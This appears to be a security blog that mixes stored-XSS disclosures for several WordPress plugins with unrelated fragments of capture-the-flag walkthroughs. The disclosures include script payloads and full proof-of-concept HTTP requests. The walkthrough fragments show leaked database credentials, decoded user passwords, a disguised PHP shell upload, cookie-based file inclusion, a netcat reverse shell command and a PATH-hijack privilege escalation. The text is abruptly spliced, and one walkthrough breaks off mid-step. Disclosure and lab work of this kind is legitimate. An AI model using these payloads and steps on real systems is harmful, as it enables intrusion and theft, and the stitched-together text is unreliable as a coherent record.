The WordPress Click to top Plugin version 1.2.7 and below were found to be vulnerable to an authenticated stored XSS vulnerability while I was auditing the plugin.
The Click to top WordPress Plugin is used to include scroll to top feature in a WordPress blog. It was found to be vulnerable toa stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.
The Type scroll text field in the plugin settings page was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the changes. It is triggered when a user loads any page on the website. All WordPress websites using Click to top WordPress Plugin version 1.2.7 and below are affected.
The image below shows our javascript is being executed when the following string is inserted into the Type scroll text field.
Click To Top</script><script>alert(document.cookie)</script>
This vulnerability can be exploited by attckers to steal session cookies or execute any malicious javascript when a user visits the page.
We are now logged in as peter. Lets see what all we can do here as a privileged user.
peter@linsecurity:~$ sudo -l
Matching Defaults entries for peter on linsecurity:
env_reset, mail_badpass,
User peter may run the following commands on linsecurity:
(ALL) NOPASSWD: /usr/bin/strace
Now we have the credentials to login to the MySQL server.
Lets try to login.
mysql -u root -h -pH4u%QJ_H99
I got an error at first, but fixed the issue with a reboot of the VM.
Lets read the data now.
show databases;
Lets find the tables and the data inside them.
MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [Users]> show tables;
| Tables_in_Users |
| users |
1 row in set (0.001 sec)
MySQL [Users]> select * from users;
| user | pass |
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
3 rows in set (0.005 sec)
Here, we have 3 users. Looks like the password is base64 encoded. Lets decode kent’s password.
It is JWzXuBJJNy.
Lets login as kent.
Lets try to upload a php shell.
Lets try to send this as jpg with Burp.
Change the filename to photo.gif, content type to image/gif and add GIF87a in the first line.
We can find our file location in response filed in Burp.
Our file is uploaded, but we cant read the file. But read the index.php through the above method.
Here, a ‘lang‘ cookie is added to load ‘en.lang.php‘ file.
Lets try changing the value to something else.
Go to Firefox Preferences > Web Developer > Storage. Add + button at the top right to add a cookie.
Cookie name: lang and value: ../upload/3f0d7f3bc6046d5eb636569c8a24ab31.gif
and now.
We got the file included.
Now lets open a reverse shell with netcat. Enter this command in the page.
nc -nv 4444 -e /bin/bash
We got a connection.
Now, We have the passwords for three users. Lets examine their home directories.
Nothing special here.
Mike’s password doesnt work. Letr try kane.
There is a file owned by mike. Lets open.
Ah! Couldnt read. What kind of file this is?
Executable. Lets try running.
kane@pwnlab:~$ ./msgmike
cat: /home/mike/msg.txt: No such file or directory
This executable tries to read msg.txt from mike’s home directory. Means the executable cat have access to mike’s home directory and we don’t have. Right?
What about changing the PATH variable and running /bin/bash with the same privileges as cat? Let’s try.
The Change WordPress Login Logo Plugin version 1.1.4 and below were found to be vulnerable to multiple stored XSS vulnerabilities while I was auditing the plugin.
Change WordPress Login Logo Plugin is used to replace WordPress default logo in WordPress login page with a user supplied image. It was found to be vulnerable to multiple stored Cross-Site Scripting (XSS) vulnerabilities. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.
The height, and width fields used updating the custom logo was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the changes. It is triggered when a user loads the WordPress login page. All WordPress websites using Change WordPress Login Logo Plugin version 1.1.4 and below are affected.
The image below shows our javascript is being executed when the following string is inserted into the height or width fields.
This vulnerability can be exploited by attckers to steal session cookies or execute any malicious javascript when a user visits the page.
WordPress WP Elegant Testimonial Plugin version 1.1.6 and below were found to be vulnerable to multiple stored XSS vulnerabilities while I was auditing the plugin.
WordPress WP Elegant Testimonial Plugin is used to insert testimonials into a WordPress site directly from the post editor. It was found to be vulnerable to multiple stored Cross-Site Scripting (XSS) vulnerabilities. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.
The name, company and text fields used while adding a testimonial to a page was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the post. It is triggered when a user loads a page where the plugin shortcode is used. All WordPress websites using WP Elegant Testimonial Plugin version 1.1.6 and below are affected.
The image below shows our javascript is being executed when the following string is inserted into the post.
This vulnerability can be exploited by attckers to steal session cookies of any users, including the admins the website. A less privileged user can exploit this vulnerability to steal the administrator’s cookies for privilege escalation.
Proof of Concept
POST /w/wp-json/wp/v2/posts/277?_locale=user HTTP/1.1
Content-Length: 197
Accept: application/json, */*;q=0.1
X-WP-Nonce: b5b10297e1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
X-HTTP-Method-Override: PUT
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse; wp-settings-time-1=1597422791
Connection: close
{"id":277,"content":"[wp_elegant_testimonial name=\"<script>alert(0)</script>\" company=\"<script>alert(0)</script>\" text=\"<script>alert(0)</script>\" image=\"\"]"}
All user inputs should be sanitized before publishing the post.
WordPress Fancybox Lightbox Plugin version 1.0.1 and below were found to be vulnerable to stored XSS while I was auditing the plugin.
WordPress Fancybox Lightbox plugin is used to add a lightbox functionality while embedding Image, Video or HTML page to your WordPress site. It was found to be vulnerable to Stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.
The ‘hyperlink’ field in used while linking a remote resource (Image, Video or web page) from a URL was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the post. It is triggered when a users loads a page where the plugin shortcode is used. All WordPress websites using Fancybox Lightbox version 1.0.1 and below are affected.
The image below shows our javascript is being executed when the following string is inserted into the post.
This vulnerability can be exploited by attckers to steal session cookies of any users, including the admins the website. A less privileged user can exploit this vulnerability to steal the administrator’s cookies for privilege escalation.
Proof of Concept
POST /w/wp-json/wp/v2/posts/213?_locale=user HTTP/1.1
Content-Length: 162
Accept: application/json, */*;q=0.1
X-WP-Nonce: 6c6cd8b63e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
X-HTTP-Method-Override: PUT
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse; wp-settings-time-1=1597422791
Connection: close
{"id":213,"content":"[wp_fancybox_media url=\"\" type=\"image\" hyperlink=\"<script>alert(0)</script>\"]"}
All user inputs should be sanitized before publishing the post.
WordPress Colorbox Lightbox Plugin version 1.1.2 and below were found to be vulnerable to stored XSS while I was auditing the plugin.
WordPress Colorbox Lightbox plugin is used to add a lightbox functionality while adding videos to your WordPress site. It was found to be vulnerable to Stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.
The ‘hyperlink’ field in used while linking an image from a URL was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the post. It is triggered when a users loads a page where the plugin shortcode is used. All WordPress websites using WordPress Colorbox Lightbox version 1.1.2 and below are affected.
The image below shows our javascript is being executed when the following string is inserted into the post.
This vulnerability can be exploited by attckers to steal session cookies of any users, including the admins the website. A less privileged user can exploit this vulnerability to steal the administrator’s cookies for privilege escalation. Thiscan lead to takeover of the web server.
Proof of Concept
POST /w/wp-json/wp/v2/posts/211?_locale=user HTTP/1.1
Content-Length: 148
Accept: application/json, */*;q=0.1
X-WP-Nonce: 6c6cd8b63e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
X-HTTP-Method-Override: PUT
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse; wp-settings-time-1=1597422791
Connection: close
{"id":211,"content":"[wp_colorbox_media url=\"\" type=\"youtube\" hyperlink=\"<script>alert(0)</script>\"]"}
All user inputs should be sanitized before publishing the post.
WordPress Responsive Lightbox2 Plugin version 1.0.2 and below were found to be vulnerable to stored XSS while I was auditing the plugin.
WordPress Responsive Lightbox2 plugin is used to add a lightbox functionality to your WordPress site. It was found to be vulnerable to Stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.
The ‘hyperlink’ field in used while linking an image from a URL was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the post. It is triggered when a users loads a page where the plugin shortcode is used. All WordPress websites using Responsive Lightbox2 version 1.0.2 and below are affected.
The image below shows our javascript is being executed when the following string is inserted into the post.
This vulnerability can be exploited by attckers to steal session cookies of any users, including the admins the website. A less privileged user can exploit this vulnerability to steal the administrator’s cookies for privilege escalation.
Proof of Concept
POST /w/wp-json/wp/v2/posts/208?_locale=user HTTP/1.1
Content-Length: 140
Accept: application/json, */*;q=0.1
X-WP-Nonce: 6c6cd8b63e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
X-HTTP-Method-Override: PUT
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse; wp-settings-time-1=1597422791
Connection: close
{"id":208,"content":"[lightbox2 url=\"\" hyperlink=\"<script>alert(0)</script>\"]"}
All user inputs should be sanitized before publishing the post.
WordPress NextGen Gallery Sell Photo Plugin version 1.0.4 and below were found to be vulnerable to stored XSS while I was auditing the plugin.
WordPress NextGen Gallery Sell Photo plugn is used to sell photos directly from NextGen Gallery in WordPress blog with payment through PayPal. It was found to be vulnerable to Stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.
The Button Text/Image field in Settings page of Sell Photos Plugin was found to be vulnerable to stored XSS, as they did not sanitize user given input properly. It is triggered when a users loads a page where the plugin is used, and when an admin opens settings page of the plugin.
The image below shows our javascript is being executed when the following string is given in the Button Text/Image field.
Buy Now "><script>alert(0)</script>
This vulnerability can be exploited by attckers to steal session cookies of any users, including the admins the website.
WordPress Easy Media Download Plugin version 1.1.4 and below were found to be vulnerable to stored XSS while I was auditing the plugin.
WordPress Media Download plugn is used to insert a download directly from WordPress post editor without using HTML. It was found to be vulnerable to Stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.
The ‘Button Text’ field in used while posting a file download was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the post. It is triggered when a users loads a page where the plugin shortcode is used. All WordPress websites using Easy Media Download by naa986 version 1.1.4 and below are affected.
The image below shows our javascript is being executed when the following string is inserted into the post.
This vulnerability can be exploited by attckers to steal session cookies of any users, including the admins the website. A less privileged user can exploit this vulnerability to steal the administrator’s cookies for privilege escalation.
Proof of Concept
POST /w/wp-json/wp/v2/posts/186?_locale=user HTTP/1.1
Content-Length: 162
Accept: application/json, */*;q=0.1
X-WP-Nonce: 6c6cd8b63e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
X-HTTP-Method-Override: PUT
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1597401311
Connection: close
{"id":186,"content":"[easy_media_download url=\"\" text=\"Free Download <script>alert(document.cookie)</script>\"]"}
All user inputs should be sanitized before publishing the post.